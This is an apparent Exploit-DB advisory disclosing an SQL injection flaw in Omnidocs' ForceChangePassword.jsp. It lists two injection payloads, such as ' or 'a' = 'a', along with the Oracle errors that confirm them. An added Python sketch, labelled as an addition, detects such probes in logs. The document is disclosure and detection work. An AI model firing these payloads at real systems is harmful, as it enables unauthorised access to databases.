Omnidocs - SQL Injection
Author: thebluegenius
type: webapps
platform: jsp
date_added: 2010-02-10
verified: 0
codes: OSVDB-62403;CVE-2010-0701
--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA
---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By: Thebluegenius
Email: rajsm@isac.org.in
Blog: thebluegenius.com
---------------------------------------------------
Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and content. It also integrates seamlessly with other enterprise applications.
------------------
Vulnerability
------------------
Affected URL: http://server/omnidocs/ForceChangePassword.jsp
Command: ' or 'a' = 'a'
Confirmed SQL injection error: ORA-00907: missing right parenthesis
Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL injection error: ORA-01756: quoted string not properly terminated
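
A detection sketch for the behaviour reported above, as an added example that is not part of the original advisory: it scans application logs for Oracle parse errors returned by the affected JSP and groups them by client. The log layout, the sample lines, the `/omnidocs/other.jsp` path and the two extra ORA codes are assumptions.

```python
import re
from collections import defaultdict

# Path from the advisory; the log layout below is an assumption.
AFFECTED_PATH = "/omnidocs/ForceChangePassword.jsp"
# The two Oracle errors reported in the advisory, plus two other Oracle
# syntax errors (an assumption about what else is worth watching).
PARSE_ERRORS = {"ORA-00907", "ORA-01756", "ORA-00933", "ORA-00936"}

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) '
    r'(?P<status>\d{3}) "(?P<body>.*)"$'
)
ORA_RE = re.compile(r"ORA-\d{5}")

def find_sqli_probes(lines, path=AFFECTED_PATH):
    """Return {client: sorted list of Oracle parse errors} seen on `path`."""
    hits = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed layout
        # Compare on the path only; ignore query string and case.
        req_path = m["path"].split("?", 1)[0].lower()
        if req_path != path.lower():
            continue
        codes = set(ORA_RE.findall(m["body"])) & PARSE_ERRORS
        if codes:
            hits[m["client"]] |= codes
    return {c: sorted(v) for c, v in hits.items()}

def triage(hits):
    """Clients with 2+ distinct parse errors are likely iterating inputs."""
    return {c: ("high" if len(v) >= 2 else "review") for c, v in hits.items()}

# Constructed sample log lines (not from the advisory).
SAMPLE_LOG = [
    '2010-02-10T10:00:01Z 203.0.113.5 POST /omnidocs/ForceChangePassword.jsp 500 "ORA-00907: missing right parenthesis"',
    '2010-02-10T10:00:09Z 203.0.113.5 POST /omnidocs/ForceChangePassword.jsp 500 "ORA-01756: quoted string not properly terminated"',
    '2010-02-10T10:01:30Z 198.51.100.7 POST /omnidocs/ForceChangePassword.jsp 200 "Password changed"',
    '2010-02-10T10:02:11Z 198.51.100.9 GET /omnidocs/other.jsp 500 "ORA-00907: missing right parenthesis"',
    '2010-02-10T10:03:00Z 192.0.2.44 POST /omnidocs/ForceChangePassword.jsp?x=1 500 "ORA-00933: SQL command not properly ended"',
    'garbled line without the expected fields',
]

if __name__ == "__main__":
    for client, level in sorted(triage(find_sqli_probes(SAMPLE_LOG)).items()):
        print(client, level)
```

Any hit also means raw database errors are reaching the client, which is worth fixing independently of the injection itself.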
-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in